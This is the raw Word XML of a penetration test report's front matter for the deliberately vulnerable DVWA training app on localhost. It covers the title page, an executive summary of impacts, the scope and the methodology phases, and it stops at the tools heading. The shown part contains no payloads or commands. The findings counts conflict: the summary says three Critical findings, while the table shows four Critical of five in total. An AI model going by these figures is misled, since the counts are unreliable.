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66105" w:rsidRDefault="00966105" w14:paraId="672A6659" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="5288F386" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>SECURITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="5B209414" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="0A37501D" w14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="5DAB6C7B" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="1B8C585D" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Penetration Testing — Web Application Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="02EB378F" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60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6240"/>
      </w:tblGrid>
      <w:tr w:rsidR="00966105" w:rsidTr="485EA61B" w14:paraId="1D37E952" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A2B4A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="03CED011" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Target Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="1C80E24F" w14:paraId="1791BF43" w14:textId="605BBED2">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DVWA - </w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="0EC0B086">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Damn Vulnerable Web Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="485EA61B" w14:paraId="0EC65698" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A2B4A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="011EFD20" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Assessment Type</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60" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3898DAB7" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Web Application Penetration Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="485EA61B" w14:paraId="0F0AD69E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A2B4A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="068E7E7E" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Report Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624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100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3F54BD85" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidP="291D6C19" w:rsidRDefault="00966105" w14:paraId="22E0FC93" w14:textId="095EFBD3">
      <w:pPr>
        <w:pStyle w:val="heading10"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="41C8F396" w14:textId="77777777">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="2F0834B2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading10"/>
        <w:shd w:val="clear" w:color="auto" w:fill="1A2B4A"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="72A3D3EC" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="599C4E35" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>This report presents the findings of a web application penetration test conducted against the Damn Vulnerable Web Application (DVWA). The assessment was performed to identify security vulnerabilities that could be exploited by malicious actors to compromise the application, its underlying infrastructure, or the sensitive data it processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="0D0B940D" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="5373F922" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>During the engagement, three (3) Critical-severity vulnerabilities were identified across the application's injection-handling functionality. Each finding has been assigned a severity rating using the Common Vulnerability Scoring System (CVSS v3.1) and mapped to the OWASP Top 10 framework.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="0E27B00A" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="1D68E34A" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The identified vulnerabilities, if left unaddressed, could allow an unauthenticated remote attacker to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="60061E4C" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="45ED27D2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Extract all data from the backend database including credentials and sensitive records</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="45452B81" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Execute arbitrary operating system commands directly on the host server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="5F0BCE27" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Perform full server reconnaissance and lateral movement within the environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="717402F3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Achieve full system compromise with minimal effort</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="44EAFD9C" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="1CD77F7D" w14:paraId="1FE302E5" w14:textId="25B24D12">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Immediate remediation is strongly recommended for all Critical-severity findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="4B94D5A5" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="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340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr w:rsidR="00966105" w:rsidTr="485EA61B" w14:paraId="54C0BD15" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="238389DB" w14:paraId="5FCD5EC4" w14:textId="2458F4D7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3DEE3525" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="666666"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Total Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FADBD8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="2B657E00" w14:paraId="0B778152" w14:textId="60D70362">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="1CE43649" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="666666"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="34AA2DD4" w14:paraId="4B584315" w14:textId="20DC7585">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="6EE12D5E" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="666666"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High/Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="2E5FA3" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="48BB8933" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="174735E6" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="666666"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Max CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3DEEC669" w14:textId="77777777">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="03504E6A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading10"/>
        <w:shd w:val="clear" w:color="auto" w:fill="1A2B4A"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:t>2. Scope and Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="3656B9AB" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="16E2FFBD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>2.1 Scope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="52D6CF19" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The assessment was limited to the following target application and components:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="45FB0818" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="198564E6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Target Application: DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="13D47346" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Target Host: http://localhost:4280</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="559A026B" w14:textId="002B22F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="03E66DE5" w:rsidR="00191B85">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Security Level: Low (default DVWA configuration)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="049F31CB" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="235547CB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>2.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="18CA3181" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The assessment followed an industry-standard penetration testing methodology aligned with OWASP Testing Guide (OTG) v4 and PTES (Penetration Testing Execution Standard). The following phases were executed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="53128261" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="548B705C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Reconnaissance — Information gathering on the target environment and attack surface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="07A14E45" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Threat Modeling — Identifying likely attack vectors and high-value targets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="186BBDCD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Vulnerability Discovery — Manual and automated scanning to identify security weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="5251F49C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Exploitation — Controlled exploitation of identified vulnerabilities to confirm impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="25971FE9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Post-Exploitation Analysis — Assessing potential business impact of successful exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="30BC507E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Reporting — Documentation of findings with evidence, impact analysis, and remediation guidance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="62486C05" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3944ED5D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>2.3 Tools Used</w:t>
      </w:r>
    </w:p>
